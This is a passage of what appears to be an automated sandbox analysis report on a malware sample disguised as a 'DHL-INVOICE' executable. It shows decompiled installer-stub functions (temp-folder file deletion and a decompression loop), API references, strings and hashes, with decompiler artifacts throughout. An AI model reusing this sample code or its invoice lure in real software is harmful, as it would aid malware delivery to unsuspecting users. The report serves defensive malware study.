							_t38 = E0040594E(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004052EC(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004052EC(0xfffffff1, _t68);
							return E0040604A(_t67, _t68, 0);
						}
						L30:
						 *0x42a2a8 =  *0x42a2a8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x004059a0
0x004059a5
0x004059ae
0x004059b1
0x004059b9
0x004059bc
0x004059bf
0x004059c7
0x004059c9
0x004059ca
0x00000000
0x004059ca
0x004059d5
0x004059d8
0x004059d8
0x004059d8
0x004059dc
0x004059ef
0x004059f6
0x004059fb
0x004059ff
0x00405a0f
0x00405a01
0x00405a07
0x00405a07
0x00405a14
0x00405a18
0x00405a24
0x00405a2a
0x00405a2f
0x00405a35
0x00405a40
0x00405a46
0x00405a48
0x00405a4b
0x00405af5
0x00405af5
0x00405af9
0x00405afb
0x00405afb
0x00405afb
0x00405afb
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a51
0x00405a51
0x00405a51
0x00405a59
0x00405a79
0x00405a81
0x00405a86
0x00405a8d
0x00405aa8
0x00405aad
0x00405aaf
0x00405ad3
0x00405ab1
0x00405ab1
0x00405ab4
0x00405ac8
0x00405ab6
0x00405ab9
0x00405ac1
0x00405ac1
0x00405ab4
0x00405a8f
0x00405a95
0x00405a97
0x00405a9d
0x00405a9d
0x00405a97
0x00000000
0x00405a8d
0x00405a5b
0x00405a63
0x00000000
0x00000000
0x00405a65
0x00405a6d
0x00000000
0x00000000
0x00405a6f
0x00405a77
0x00000000
0x00000000
0x00000000
0x00405ad8
0x00405ae0
0x00405ae6
0x00405ae6
0x00405aef
0x00000000
0x00405aef
0x00405a1a
0x00405a22
0x00000000
0x00000000
0x00000000
0x004059de
0x004059de
0x004059e0
0x00405b00
0x00405b02
0x00405b05
0x00405b56
0x00405b56
0x00405b56
0x00405b07
0x00405b0a
0x00405b15
0x00405b1a
0x00405b1c
0x00000000
0x00000000
0x00405b1f
0x00405b2b
0x00405b30
0x00405b32
0x00000000
0x00405b4d
0x00405b34
0x00405b37
0x00000000
0x00000000
0x00405b3c
0x00000000
0x00405b43
0x00405b0c
0x00405b0c
0x00000000
0x00405b0c
0x004059e6
0x004059e9
0x00000000
0x00000000
0x00000000
0x004059e9

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75F73420,00000000), ref: 004059BF
lstrcatW.KERNEL32(004256F0,\*.*), ref: 00405A07
lstrcatW.KERNEL32(?,0040A014), ref: 00405A2A
lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75F73420,00000000), ref: 00405A30
FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75F73420,00000000), ref: 00405A40
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
FindClose.KERNEL32(00000000), ref: 00405AEF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4
"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe", xrefs: 00405996
\*.*, xrefs: 00405A01

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\DHL-INVOICE-MBV.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2708103164
Opcode ID: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
Opcode Fuzzy Hash: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0040698E() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407231))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4)); // executed
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
